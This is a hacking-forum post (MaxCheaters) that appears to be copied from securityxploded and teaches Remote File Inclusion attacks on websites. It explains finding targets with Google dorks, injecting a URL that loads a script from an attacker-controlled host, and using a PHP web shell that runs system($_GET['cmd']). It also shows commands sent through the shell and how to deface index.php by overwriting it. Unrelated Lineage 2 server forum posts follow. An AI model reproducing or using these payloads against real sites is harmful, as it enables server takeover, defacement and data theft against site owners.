Jump to content
MaxCheaters Official Group on X
MaxCheaters Official Group on Discord

Remote File Inclusion [RFI]

The High Roller
 Share

Recommended Posts

The High Roller Newbie

The High Roller

Posted
Posted

 

What Is RFI(Remote File Inclusion)/Introduction:

-----------------------------------------------------------

RFI stands for Remote File Inclusion that allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability exploit the poor validation checks in websites and can eventually lead to code execution on server or code execution on website (XSS attack using javascript). This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of tutorial, I suppose you will know what it is all about and may be able to deploy an attack or two.

 

RFI is a common vulnerability and trust me all website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and do almost anything. What makes it more dangerous is that you only need to have your common sense and basic knowledge of PHP to execute this one, some BASH might come handy as most of servers today are hosted on Linux.

-----------------------------------------------------------------

Starting with RFI

 

Lets get it started. The first step is to find vulnerable site, you can easily find them using Google dorks.If you don't have any idea, you might want to read about advanced password hacking using Google dorks or to use automated tool to apply Google dorks using Google. Now lets assume we have found a vulnerable website

 

http://victimsite.com/index.php?page=home

 

As you can see, this website pulls documents stored in text format from server and renders them as web pages. We can find ways around it as it uses PHP include function to pull them out. Lets check it out.

 

http://victimsite.com/index.php?page=http://hackersite.com/evilscript.txt

 

I have included a custom script "evilscript" in text format from my website, which contains some code.Now, if its a vulnerable website, then any of these 3 things can happen

----------------------------------------------

    Case 1 - You might have noticed that the url consisted of "page=home" had no extension, but I have included an extension in my url,hence the site may give an error like 'failure to include evilscript.txt.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.

 

    Case 2 - In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.

    Case 3 - successfull execution :)

----------------------------------------------

Now once you have battled around this one, you might want to learn what to code inside the script. You may get a custom coded infamous C99 script (too bloaty but highly effective once deployed) or you might code yourself a new one. For this knowledge of PHP might come in handy. Here we go

-------------------------------------------

<?php
echo "<script>alert(U 4r3 0wn3d !!);</script>";
echo "Run command: ".htmlspecialchars($_GET['cmd']);

system($_GET['cmd']);
?>

--------------------------------------------

The above code allows you to exploit include function and tests if the site if RFI (XSS) vulnerable by running the alert box code and if successful, you can send custom commands to the linux server in bash. So, if you are in luck and if it worked, lets try our hands on some Linux commands. For example to find the current working directory of server and then to list files, we will be using 'pwd' and 'ls' commands

 

 http//victimsite.com/index.php?cmd=pwd&page=http://hackersite.com/ourscript

 

http//victimsite.com/index.php?cmd=ls&page=http://hackersite.com/ourscript

 

What it does is that it sends the command as cmd we put in our script and begins print the working directory and list the documents.Even better you can almost make the page proclaim that you hacked it by using the 'echo' command.

 

 cmd=echo U r pwn3d by dwg> index.php

 

It will then re-write the index.php and render it.In case, its a primitive website which stores pages with .txt extension, you might want to put it with along the .txt files. Now as expected, we are now the alpha and the omega of the website :) we can download, remove, rename, anything! Want to download stuff ? try the 'wget' function...

 

I leave the rest to your creativity !

 

Original Source:

http://securityxploded.com/remote-file-inclusion.php

  • 2 weeks later...
  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing


  • Posts

    • protoftw
      Graphic/Html Designs - Protojah

      By protoftw · Posted

      L2 DEVS - HTML DESIGN (ALL NPC'S)    
    • Tinker123aa
      HAPPY 2025 By Guytis

      By Tinker123aa · Posted

      I only share for free what they are reselling 🙂 You keep crying in all the publications, and if you are looking for h5 or gd wait for 5 or 6 years... cheers.... GENERAL Cached Extended to 8192kb IOBuffer Hair2SlotCache ItemBidAuctioner Clan Hall Current Olympiad Season Rank pages System (Shows Points/Games - Fully Configurable) Automatic Flag Around Raidboss System Offline Shop & Buffers Restore After Restart (Fixed location) Offline Buffer System PvP Auto Announce System Rebuilt with Extra Addons (Fully Configurable, Name, Zones, Rewards) Automatic Announce System Rebuilt with Extra Addons (Fully Configurable) ALT+B Augmentation House Shift+Click Droplist/Spoil List Epic Items Rank RB points Rank ChangeColorName ChangeColorTitle Change Skin (Race) Change Gender Custom Subclass (Acumulative) Achievements Item Delivery System  Augmentations/Enchants Automatic Announce System Auto Learn Skills PvP Reward Pk Reward War Reward Scheme buffer GlobalChatTrade Trade Augment Items Castle Announce Time Castle Standby Time Fix Spiritshots delay SpellbooksDrop Enable/Disable Drop custom Fully configurable, lvl min max allmobs, allrb, individual New cancel effect min,max BlessedarmorEnchantRate BlessedmagicWeaponEnchantRate BlessednormalWeaponEnchantRate MaxSlosChars MaxSlotsDwarfs Enable or disable all commands Fix fast loading npc OlympiadRestoreStatsOnFightStart OlympiadSystemSecondTimeEnabled OlympiadEnterLast10Minute OlympiadThirdClassSummons MinLevelTrade AnnounceSubClassMsg1 AnnounceSubClassMsg2 AnnounceSubClassMsg3 LimitedSubClassRace NoSellItems Change ID SealStones for AA NoPrivateBuyItems NoDropPlayerOnDie DisableSkillEnchantData Show Level Mobs Show npc clan flag DespawnSummonEnBattle SummonPetEnBattle RideSummonPetEnBattle DitanceToTargetMove EnterWorld_Undying EnterWorld_UnHide BlockWhispMessagePlayerToGM UseItemsWithHide CriticalSkillDamageBonusPer=4.0 Disable SSQSystem OnCastle Siege End Use any dyes Buy halls directly in auctioneer without waiting for the auction, configuration to change the item you consume MensajeEnterWorldServer Command .hero enable/disable hero aura Config vip global chat character, chat by systemsg Soulshots: NoSendSystemMessageUse Panel //admin Global vote reward Agathions system Anti Interface, control all patch files by md5 Command .menu configurable, last restart, name, maxusers, privatestores Spawn protection activate deactivate consume items to activate  Activate or deactivate autoloot for vip characters EVENTS Happy Hour Event reworked Configurable by announcements or systemsg Team VS Team Capture The Flag Death Match Last Man Standing Destroy The Base Korean Style Castle Siege Check if the player is inside the tvt event due to disconnection/critical error Top 1/5 killer reward/announce TimeAfk ResetReuseSkills ResetBuffsOnFinish Firework effect Reward win/lost Add Team Location Title custom Red/blue Open Door/Wall System BalanceBishops Show kills in title Invest positions Show Death To Top Delete Non-Subclass Skills     RELOADS Reload Enterworld Html Option Reload Faction System Reload Donate Shop Reload OfflineBuffer Reload Champion NPC Reload CliExt Reload AntiBot Reload Vip System Reload Auction Reload AutoLoot Reload CastleSiegeManager Reload CharacterLock Reload ClanPvPStatus Reload AutoLearn Reload ClanReputationRank Reload ClanSystem Reload CreatureAction Reload Customs.ini Reload L2server.ini Reload SkillData.txt Reload doordata.txt Reload decodata.txt Reload Multisell Reload DropList   Extender tested for more than 3 years. Assured stability. Possibility of adding MOD's upon request. (Not included, consult).
    • Nightw0lf
      HAPPY 2025 By Guytis

      By Nightw0lf · Posted

      some peoples trash is another mans treasure, is that your treasure?   people might like the content but you are still the rat in the room     thats the community judging you.  
    • Nightw0lf
      Happy 2025 Ext IL, Packs and Webs. By Guytis

      By Nightw0lf · Posted

      was that the decoy topic?
    • Tinker123aa
      Happy 2025 Ext IL, Packs and Webs. By Guytis

      By Tinker123aa · Posted

      Keep reselling what I publish here for free!!! 🙂 GG  

  • Topics

×
×
  • Create New...